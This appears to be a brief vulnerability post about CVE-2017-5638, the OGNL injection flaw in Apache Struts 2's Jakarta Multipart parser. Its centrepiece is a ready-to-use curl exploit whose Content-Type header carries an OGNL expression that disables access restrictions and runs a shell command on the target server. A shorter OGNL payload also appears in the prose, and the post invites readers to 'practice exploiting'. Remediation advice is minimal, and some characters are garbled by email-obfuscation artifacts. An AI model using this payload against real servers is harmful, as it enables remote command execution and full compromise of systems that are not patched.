Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent with a file upload request, the framework incorrectly processes it. Specifically, if the header contains malicious Object-Graph Navigation Language (OGNL) expressions, the framework attempts to evaluate them as part of the error message generation when a file upload fails. This evaluation occurs due to insufficient validation and escaping of the header’s value. An attacker can craft a request with a Content-Type header that includes OGNL code, such as %{_memberAccess.allowStaticMethodAccess=true,[email protected]@getResponse().getWriter(),res.println('hacked'),res.close()}. Because the framework allows static method access and executes the expression, this leads to arbitrary command execution on the server with the privileges of the Struts application process, effectively granting the attacker full control.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target/upload.action`
How Exploit:
Malicious Content-Type header.
OGNL expression injection.
Arbitrary command execution.
Protection from this CVE
Update Struts version.
Use alternative parser.
Input validation/Sanitization.
Impact:
Full server compromise.
Data breach.
Application takeover.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

